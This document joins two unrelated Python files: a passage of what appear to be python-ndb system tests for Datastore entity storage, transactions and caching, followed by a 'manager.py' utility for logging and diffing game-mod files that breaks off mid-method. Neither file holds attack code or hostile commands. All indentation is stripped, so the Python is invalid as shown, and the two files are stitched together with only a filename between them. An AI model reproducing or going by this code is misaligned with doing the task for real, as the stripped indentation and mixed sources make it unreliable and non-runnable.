entity1_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity1_id, foo=42, bar="none")
entity2_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity2_id, foo=65, bar="naan")
entity3_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity3_id, foo=66, bar="route")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key1 = ndb.Key(KIND, entity1_id)
key2 = ndb.Key(KIND, entity2_id)
key3 = ndb.Key(KIND, entity3_id)
@ndb.tasklet
def get_two_entities():
entity1, (entity2, entity3) = yield (
key1.get_async(),
[key2.get_async(), key3.get_async()],
)
raise ndb.Return(entity1, entity2, entity3)
entity1, entity2, entity3 = get_two_entities().result()
assert isinstance(entity1, SomeKind)
assert entity1.foo == 42
assert entity1.bar == "none"
assert isinstance(entity2, SomeKind)
assert entity2.foo == 65
assert entity2.bar == "naan"
assert isinstance(entity3, SomeKind)
assert entity3.foo == 66
assert entity3.bar == "route"
@pytest.mark.usefixtures("client_context")
def test_insert_entity(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
# Make sure strings are stored as strings in datastore
ds_entity = ds_client.get(key._key)
assert ds_entity["bar"] == "none"
@pytest.mark.usefixtures("client_context")
def test_insert_entity_with_stored_name_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.StringProperty()
bar = ndb.StringProperty(name="notbar")
entity = SomeKind(foo="something", bar="or other")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == "something"
assert retrieved.bar == "or other"
ds_entity = ds_client.get(key._key)
assert ds_entity["notbar"] == "or other"
@pytest.mark.usefixtures("client_context")
def test_insert_roundtrip_naive_datetime(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.DateTimeProperty()
entity = SomeKind(foo=datetime.datetime(2010, 5, 12, 2, 42))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == datetime.datetime(2010, 5, 12, 2, 42)
@pytest.mark.usefixtures("client_context")
def test_datetime_w_tzinfo(dispose_of, ds_client):
class timezone(datetime.tzinfo):
def __init__(self, offset):
self.offset = datetime.timedelta(hours=offset)
def utcoffset(self, dt):
return self.offset
def dst(self, dt):
return datetime.timedelta(0)
mytz = timezone(-4)
class SomeKind(ndb.Model):
foo = ndb.DateTimeProperty(tzinfo=mytz)
bar = ndb.DateTimeProperty(tzinfo=mytz)
entity = SomeKind(
foo=datetime.datetime(2010, 5, 12, 2, 42, tzinfo=timezone(-5)),
bar=datetime.datetime(2010, 5, 12, 2, 42),
)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == datetime.datetime(2010, 5, 12, 3, 42, tzinfo=mytz)
assert retrieved.bar == datetime.datetime(2010, 5, 11, 22, 42, tzinfo=mytz)
def test_parallel_threads(dispose_of, namespace):
client = ndb.Client(namespace=namespace)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def insert(foo):
with client.context(cache_policy=False):
entity = SomeKind(foo=foo, bar="none")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
assert retrieved.bar == "none"
thread1 = threading.Thread(target=insert, args=[42], name="one")
thread2 = threading.Thread(target=insert, args=[144], name="two")
thread1.start()
thread2.start()
thread1.join()
thread2.join()
@pytest.mark.usefixtures("client_context")
def test_large_json_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.JsonProperty()
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_compressed_json_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.JsonProperty(compressed=True)
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_compressed_blob_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.BlobProperty(compressed=True)
foo = b"abc" * 100
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_compressed_repeated_local_structured_property(dispose_of, ds_client):
class Dog(ndb.Model):
name = ndb.StringProperty()
class House(ndb.Model):
dogs = ndb.LocalStructuredProperty(Dog, repeated=True, compressed=True)
entity = House()
dogs = [Dog(name="Mika"), Dog(name="Mocha")]
entity.dogs = dogs
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.dogs == dogs
def test_get_by_id_with_compressed_repeated_local_structured_property(
client_context, dispose_of, ds_client
):
class Dog(ndb.Model):
name = ndb.TextProperty()
class House(ndb.Model):
dogs = ndb.LocalStructuredProperty(Dog, repeated=True, compressed=True)
with client_context.new(legacy_data=True).use():
entity = House()
dogs = [Dog(name="Mika"), Dog(name="Mocha")]
entity.dogs = dogs
key = entity.put()
house_id = key.id()
dispose_of(key._key)
retrieved = House.get_by_id(house_id)
assert retrieved.dogs == dogs
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_compressed_property(
ds_entity_with_meanings,
):
class SomeKind(ndb.Model):
blob = ndb.BlobProperty()
value = b"abc" * 1000
compressed_value = zlib.compress(value)
entity_id = test_utils.system.unique_resource_id()
ds_entity_with_meanings(
{"blob": (22, compressed_value)},
KIND,
entity_id,
**{"blob": compressed_value}
)
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.blob == value
@pytest.mark.usefixtures("client_context")
def test_large_pickle_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.PickleProperty()
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_key_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.KeyProperty()
key_value = ndb.Key("Whatevs", 123)
entity = SomeKind(foo=key_value)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == key_value
@pytest.mark.usefixtures("client_context")
def test_multiple_key_properties(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.KeyProperty(kind="Whatevs")
bar = ndb.KeyProperty(kind="Whatevs")
foo = ndb.Key("Whatevs", 123)
bar = ndb.Key("Whatevs", 321)
entity = SomeKind(foo=foo, bar=bar)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
assert retrieved.bar == bar
assert retrieved.foo != retrieved.bar
def test_insert_entity_with_caching(client_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
client_context.set_cache_policy(None) # Use default
entity = SomeKind(foo=42, bar="none")
key = entity.put()
with client_context.new(cache_policy=False).use():
# Sneaky. Delete entity out from under cache so we know we're getting
# cached copy.
key.delete()
eventually(key.get, _equals(None))
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
def test_insert_entity_with_global_cache(dispose_of, client_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
cache_dict = global_cache_module._InProcessGlobalCache.cache
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
cache_key = _cache.global_cache_key(key._key)
assert not cache_dict
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
assert cache_key in cache_dict
entity.foo = 43
entity.put()
# This is py27 behavior. I can see a case being made for caching the
# entity on write rather than waiting for a subsequent lookup.
assert cache_key not in cache_dict
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_insert_entity_with_redis_cache(dispose_of, redis_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
cache_key = _cache.global_cache_key(key._key)
assert redis_context.global_cache.redis.get(cache_key) is None
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
assert redis_context.global_cache.redis.get(cache_key) is not None
entity.foo = 43
entity.put()
# This is py27 behavior. I can see a case being made for caching the
# entity on write rather than waiting for a subsequent lookup.
assert redis_context.global_cache.redis.get(cache_key) is None
@pytest.mark.usefixtures("client_context")
def test_update_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
entity = key.get()
entity.foo = 56
entity.bar = "high"
assert entity.put() == key
retrieved = key.get()
assert retrieved.foo == 56
assert retrieved.bar == "high"
@pytest.mark.usefixtures("client_context")
def test_insert_entity_in_transaction(dispose_of):
commit_callback = mock.Mock()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def save_entity():
ndb.get_context().call_on_commit(commit_callback)
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
return key
key = ndb.transaction(save_entity)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
commit_callback.assert_called_once_with()
@pytest.mark.usefixtures("client_context")
def test_update_entity_in_transaction(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def update_entity():
key = ndb.Key(KIND, entity_id)
entity = key.get()
entity.foo = 56
entity.bar = "high"
assert entity.put() == key
return key
key = ndb.transaction(update_entity)
retrieved = key.get()
assert retrieved.foo == 56
assert retrieved.bar == "high"
@pytest.mark.usefixtures("client_context")
def test_parallel_transactions():
def task(delay):
@ndb.tasklet
def callback():
transaction = ndb.get_context().transaction
yield ndb.sleep(delay)
assert ndb.get_context().transaction == transaction
raise ndb.Return(transaction)
return callback
future1 = ndb.transaction_async(task(0.1))
future2 = ndb.transaction_async(task(0.06))
ndb.wait_all((future1, future2))
assert future1.get_result() != future2.get_result()
@pytest.mark.usefixtures("client_context")
def test_delete_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
assert key.delete() is None
assert key.get() is None
assert key.delete() is None
def test_delete_entity_with_caching(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
client_context.set_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
assert key.delete() is None
assert key.get() is None
assert key.delete() is None
def test_delete_entity_with_global_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
cache_key = _cache.global_cache_key(key._key)
global_cache = global_cache_module._InProcessGlobalCache()
cache_dict = global_cache_module._InProcessGlobalCache.cache
with client_context.new(global_cache=global_cache).use():
assert key.get().foo == 42
assert cache_key in cache_dict
assert key.delete() is None
assert cache_key not in cache_dict
# This is py27 behavior. Not entirely sold on leaving _LOCKED value for
# Datastore misses.
assert key.get() is None
assert cache_dict[cache_key][0] == b"0"
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_delete_entity_with_redis_cache(ds_entity, redis_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
cache_key = _cache.global_cache_key(key._key)
assert key.get().foo == 42
assert redis_context.global_cache.redis.get(cache_key) is not None
assert key.delete() is None
assert redis_context.global_cache.redis.get(cache_key) is None
# This is py27 behavior. Not entirely sold on leaving _LOCKED value for
# Datastore misses.
assert key.get() is None
assert redis_context.global_cache.redis.get(cache_key) == b"0"
@pytest.mark.usefixtures("client_context")
def test_delete_entity_in_transaction(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
def delete_entity():
assert key.delete() is None
assert key.get().foo == 42 # not deleted until commit
ndb.transaction(delete_entity)
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_delete_entity_in_transaction_then_rollback(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
def delete_entity():
assert key.delete() is None
raise Exception("Spurious error")
with pytest.raises(Exception):
ndb.transaction(delete_entity)
assert key.get().foo == 42
@pytest.mark.usefixtures("client_context")
def test_allocate_ids():
class SomeKind(ndb.Model):
pass
keys = SomeKind.allocate_ids(5)
assert len(keys) == 5
for key in keys:
assert key.id()
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_get_by_id(ds_entity):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
entity = SomeKind.get_by_id(entity_id)
assert entity.foo == 42
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_get(ds_entity):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
ds_entity(KIND, name, foo=42)
entity = SomeKind.get_or_insert(name, foo=21)
assert entity.foo == 42
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_insert(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
entity = SomeKind.get_or_insert(name, foo=21)
dispose_of(entity._key._key)
assert entity.foo == 21
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_get_in_transaction(ds_entity):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
def do_the_thing():
ds_entity(KIND, name, foo=42)
return SomeKind.get_or_insert(name, foo=21)
entity = ndb.transaction(do_the_thing)
assert entity.foo == 42
@pytest.mark.usefixtures("client_context")
def test_insert_entity_with_structured_property(dispose_of):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
entity = SomeKind(foo=42, bar=OtherKind(one="hi", two="mom"))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
def test_insert_entity_with_structured_property_legacy_data(
client_context, dispose_of, ds_client
):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
with client_context.new(legacy_data=True).use():
entity = SomeKind(foo=42, bar=OtherKind(one="hi", two="mom"))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
ds_entity = ds_client.get(key._key)
assert ds_entity["foo"] == 42
assert ds_entity["bar.one"] == "hi"
assert ds_entity["bar.two"] == "mom"
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_structured_property(ds_entity):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
entity_id = test_utils.system.unique_resource_id()
ds_entity(
KIND, entity_id, **{"foo": 42, "bar.one": "hi", "bar.two": "mom"}
)
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_repeated_structured_property(ds_entity):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind, repeated=True)
entity_id = test_utils.system.unique_resource_id()
ds_entity(
KIND,
entity_id,
**{"foo": 42, "bar.one": ["hi", "hello"], "bar.two": ["mom", "dad"]}
)
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar[0].one == "hi"
assert retrieved.bar[0].two == "mom"
assert retrieved.bar[1].one == "hello"
assert retrieved.bar[1].two == "dad"
assert isinstance(retrieved.bar[0], OtherKind)
assert isinstance(retrieved.bar[1], OtherKind)
@pytest.mark.usefixtures("client_context")
def test_insert_expando(dispose_of):
class SomeKind(ndb.Expando):
foo = ndb.IntegerProperty()
entity = SomeKind(foo=42)
entity.expando_prop = "exp-value"
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.expando_prop == "exp-value"
@pytest.mark.usefixtures("client_context")
def test_insert_polymodel(dispose_of):
class Animal(ndb.PolyModel):
one = ndb.StringProperty()
class Feline(Animal):
two = ndb.StringProperty()
class Cat(Feline):
three = ndb.StringProperty()
entity = Cat(one="hello", two="dad", three="i'm in jail")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved, Animal)
assert isinstance(retrieved, Cat)
assert retrieved.one == "hello"
assert retrieved.two == "dad"
assert retrieved.three == "i'm in jail"
@pytest.mark.usefixtures("client_context")
def test_insert_autonow_property(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.StringProperty()
created_at = ndb.DateTimeProperty(indexed=True, auto_now_add=True)
updated_at = ndb.DateTimeProperty(indexed=True, auto_now=True)
entity = SomeKind(foo="bar")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved.created_at, datetime.datetime)
assert isinstance(retrieved.updated_at, datetime.datetime)
@pytest.mark.usefixtures("client_context")
def test_insert_nested_autonow_property(dispose_of):
class OtherKind(ndb.Model):
created_at = ndb.DateTimeProperty(indexed=True, auto_now_add=True)
updated_at = ndb.DateTimeProperty(indexed=True, auto_now=True)
class SomeKind(ndb.Model):
other = ndb.StructuredProperty(OtherKind)
entity = SomeKind(other=OtherKind())
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved.other.created_at, datetime.datetime)
assert isinstance(retrieved.other.updated_at, datetime.datetime)
@pytest.mark.usefixtures("client_context")
def test_uninitialized_property(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.StringProperty(required=True)
entity = SomeKind()
with pytest.raises(ndb.exceptions.BadValueError):
entity.put()
@mock.patch(
"google.cloud.ndb._datastore_api.make_call",
mock.Mock(side_effect=Exception("Datastore shouldn't get called.")),
)
def test_crud_without_datastore(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
context.set_datastore_policy(False) # Don't use Datastore
key = ndb.Key(KIND, entity_id)
SomeKind(foo=42, bar="none", baz="night", _key=key).put()
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
key.delete()
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_computed_key_property(dispose_of):
"""Regression test for #284.
https://github.com/googleapis/python-ndb/issues/284
"""
class AModel(ndb.Model):
s_foo = ndb.StringProperty()
class BModel(ndb.Model):
s_bar = ndb.StringProperty()
key_a = ndb.KeyProperty(kind="AModel", indexed=True)
class CModel(ndb.Model):
s_foobar = ndb.StringProperty()
key_b = ndb.KeyProperty(kind="BModel", indexed=True)
key_a = ndb.ComputedProperty( # Issue here
lambda self: self.key_b.get().key_a if self.key_b else None,
)
key_a = AModel(s_foo="test").put()
dispose_of(key_a._key)
key_b = BModel(s_bar="test", key_a=key_a).put()
dispose_of(key_b._key)
key_c = CModel(s_foobar="test", key_b=key_b).put()
dispose_of(key_c._key)
entity = key_c.get()
assert entity.key_a == key_a
assert entity.key_b == key_b
@pytest.mark.usefixtures("client_context")
def test_user_property(dispose_of):
class SomeKind(ndb.Model):
user = ndb.UserProperty()
user = ndb.User("somebody@example.com", "gmail.com")
entity = SomeKind(user=user)
key = entity.put()
dispose_of(key._key)
retreived = key.get()
assert retreived.user.email() == "somebody@example.com"
assert retreived.user.auth_domain() == "gmail.com"
@pytest.mark.usefixtures("client_context")
def test_user_property_different_user_class(dispose_of):
class SomeKind(ndb.Model):
user = ndb.UserProperty()
class User(object):
def email(self):
return "somebody@example.com"
def auth_domain(self):
return "gmail.com"
def user_id(self):
return None
entity = SomeKind(user=User())
key = entity.put()
dispose_of(key._key)
retreived = key.get()
assert retreived.user.email() == "somebody@example.com"
assert retreived.user.auth_domain() == "gmail.com"
@pytest.mark.usefixtures("client_context")
def test_repeated_empty_strings(dispose_of):
"""Regression test for issue # 300.
https://github.com/googleapis/python-ndb/issues/300
"""
class SomeKind(ndb.Model):
foo = ndb.StringProperty(repeated=True)
entity = SomeKind(foo=["", ""])
key = entity.put()
dispose_of(key._key)
retreived = key.get()
assert retreived.foo == ["", ""]
@pytest.mark.usefixtures("redis_context")
def test_multi_get_weirdness_with_redis(dispose_of):
"""Regression test for issue #294.
https://github.com/googleapis/python-ndb/issues/294
"""
class SomeKind(ndb.Model):
foo = ndb.StringProperty()
objects = [SomeKind(foo=str(i)) for i in range(10)]
keys = ndb.put_multi(objects)
for key in keys:
dispose_of(key._key)
ndb.get_multi(keys)
one_object = random.choice(keys).get()
one_object.foo = "CHANGED"
one_object.put()
objects_upd = ndb.get_multi(keys)
keys_upd = [obj.key for obj in objects_upd]
assert len(keys_upd) == len(keys)
assert len(set(keys_upd)) == len(set(keys))
assert set(keys_upd) == set(keys)
@pytest.mark.usefixtures("client_context")
def test_multi_with_lots_of_keys(dispose_of):
"""Regression test for issue #318.
https://github.com/googleapis/python-ndb/issues/318
"""
N = 1001
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
foos = list(range(N))
entities = [SomeKind(foo=foo) for foo in foos]
keys = ndb.put_multi(entities)
dispose_of(*(key._key for key in keys))
assert len(keys) == N
entities = ndb.get_multi(keys)
assert [entity.foo for entity in entities] == foos
ndb.delete_multi(keys)
entities = ndb.get_multi(keys)
assert entities == [None] * N
@pytest.mark.usefixtures("client_context")
def test_allocate_a_lot_of_keys():
N = 1001
class SomeKind(ndb.Model):
pass
keys = SomeKind.allocate_ids(N)
assert len(keys) == N
@pytest.mark.usefixtures("client_context")
def test_delete_multi_with_transactional(dispose_of):
"""Regression test for issue #271
https://github.com/googleapis/python-ndb/issues/271
"""
N = 10
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
@ndb.transactional()
def delete_them(entities):
ndb.delete_multi([entity.key for entity in entities])
foos = list(range(N))
entities = [SomeKind(foo=foo) for foo in foos]
keys = ndb.put_multi(entities)
dispose_of(*(key._key for key in keys))
entities = ndb.get_multi(keys)
assert [entity.foo for entity in entities] == foos
assert delete_them(entities) is None
entities = ndb.get_multi(keys)
assert entities == [None] * N
@pytest.mark.usefixtures("client_context")
def test_compressed_text_property(dispose_of, ds_client):
"""Regression test for #277
https://github.com/googleapis/python-ndb/issues/277
"""
class SomeKind(ndb.Model):
foo = ndb.TextProperty(compressed=True)
entity = SomeKind(foo="Compress this!")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == "Compress this!"
ds_entity = ds_client.get(key._key)
assert zlib.decompress(ds_entity["foo"]) == b"Compress this!"
def test_insert_entity_with_repeated_local_structured_property_legacy_data(
client_context, dispose_of, ds_client
):
"""Regression test for #326
https://github.com/googleapis/python-ndb/issues/326
"""
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.LocalStructuredProperty(OtherKind, repeated=True)
with client_context.new(legacy_data=True).use():
entity = SomeKind(
foo=42,
bar=[
OtherKind(one="hi", two="mom"),
OtherKind(one="and", two="dad"),
],
)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar[0].one == "hi"
assert retrieved.bar[0].two == "mom"
assert retrieved.bar[1].one == "and"
assert retrieved.bar[1].two == "dad"
assert isinstance(retrieved.bar[0], OtherKind)
assert isinstance(retrieved.bar[1], OtherKind)
def test_insert_structured_property_with_unindexed_subproperty_legacy_data(
client_context, dispose_of, ds_client
):
"""Regression test for #341
https://github.com/googleapis/python-ndb/issues/341
"""
class OtherKind(ndb.Model):
data = ndb.BlobProperty(indexed=False)
class SomeKind(ndb.Model):
entry = ndb.StructuredProperty(OtherKind)
with client_context.new(legacy_data=True).use():
entity = SomeKind(entry=OtherKind(data=b"01234567890" * 1000))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved.entry, OtherKind)
|
manager.py
|
import zipfile
import os
import sys
import struct
import difflib
import math
import time
import threading
import xml.etree.ElementTree as etree
import logging
import datetime
import traceback
def init_plog( log_folder_path, filename = None, format=None, datefmt = None, keep_logs=10 ):
logger = logging.getLogger()
if not os.path.isdir( log_folder_path ):
os.makedirs(log_folder_path)
datefmt = datefmt or '%Y-%m-%d ~ %H-%M-%S-%p'
log_folder = File( log_folder_path, [] )
log_file_path = filename or datetime.datetime.now().strftime( log_folder.filepath + '%Y-%m-%d ~ %H-%M-%S-%f' + '.log' )
while len( log_folder.contents ) >= keep_logs:
os.remove( log_folder.filepath + log_folder.contents.pop(0) )
format = format or '[%(asctime)-22s] : %(message)s'
logging.basicConfig( filename = os.sep.join( log_file_path.split(os.sep)[-2:] ), filemode = 'w', format = format, datefmt=datefmt, level=logging.DEBUG )
logging.captureWarnings(True)
#Debug Print
def dprint( msg, *args, end='\n' ):
''' Usage:
>>>dprint( 'blah `3 be `3 dee `2 `1 sa `0.', 'ni', 'hi', 'bi', 'fly' )
>>>blah <class 'str'>(fly) be <class 'str'>(fly) dee <class 'str'>(bi) <class 'str'>(hi) sa <class 'str'>(ni).
'''
if args:
list = []
for arg in args:
list.append( arg )
msg = msg.split( '`' )
for i in range( len( msg ) ):
list_index = ''
char_list = [ char for char in msg[ i ] ]
for j in range( len( char_list ) ):
char = char_list[ j ]
if char.isdigit():
list_index += char_list.pop( j )
else:
break
msg[ i ] = ''.join( char_list )
if list_index:
list_index = int( list_index )
msg[ i-1 ] = str( msg[ i-1 ] ) + str( type( list[ list_index ] ) ) + '( ' + str( list[ list_index ] ) + ' )'
msg = ''.join( msg )
plog( msg, end=end )
else:
plog( '{0}({1})'.format( type(msg), msg ) )
def plog( msg, level=logging.INFO, end='\n', *args, **kwargs ):
if msg == '':
msg = ' '*100
logger = logging.getLogger()
logger.log( level, msg, *args, **kwargs )
if level >= logging.INFO :
print( '{0}{1}'.format( msg, ' '*100 ) , end = end )
def reindentXmlString( xmlToFix ):
xml = etree.fromstringlist( xmlToFix )
return etree.tostring(xml, encoding='utf-8', method='xml').decode()
def pop_str( str, index ):
try:
index = index % len(str)+1
except ZeroDivisionError:
index = 0
return str[:index-1] + str[index:]
def insert_str( str, index, value ):
try:
index = index % len(str)+1
except ZeroDivisionError:
index = 0
return str[:index-1] + value + str[index:]
class DiffCombiner( object ):
def __init__( self, diff_report_folder, original_game_file, mod_file, omni_mod_file, mod_pak_name, log_folder_path, accuracy, area_size ):
if diff_report_folder[-1] != os.sep:
diff_report_folder += os.sep
self.diff_report_folder = diff_report_folder
self.log_folder_path = log_folder_path
if self.log_folder_path[-1] != os.sep:
self.log_folder_path += os.sep
self.reindent = False
self.accuracy = accuracy
self.area_size = area_size
if self.area_size % 2 != 1:
self.area_size += 1
self.mod_pak_name = mod_pak_name.split(os.sep)[-1]
self.mod_file = mod_file
self.mod_file_path = self.mod_file.filepath
'''
#Makes sure every indentation is 4 spaces (as opposed to 1 space or 2 spaces)
if self.mod_file_path[-4:] == '.xml':
self.mod_file = reindentXmlString( self.mod_file ).splitlines( keepends=True )
'''
self.original_file = original_game_file.contents
'''
#Makes sure every indentation is 4 spaces (as opposed to 1 space or 2 spaces)
if self.mod_file_path[-4:] == '.xml':
self.original_file = reindentXmlString( self.original_file ).splitlines( keepends=True )
'''
self.omni_mod_file = omni_mod_file.contents
def diffs_to_folder( self ):
d = [ x for x in difflib.ndiff( self.original_file.split('\n') , self.mod_file.contents.split('\n') ) ]
if not os.path.exists(self.diff_report_folder):
os.makedirs(self.diff_report_folder)
if d:
with open( '{0}diff_report{1}.txt'.format( self.diff_report_folder, len( os.listdir( self.diff_report_folder ) ) ), 'w' ) as diffile:
diffile.write( ''.join( d ) )
return '\n'.join( d )
def similarity(self, str1, str2):
''' returns how similar two strings are as a percentage '''
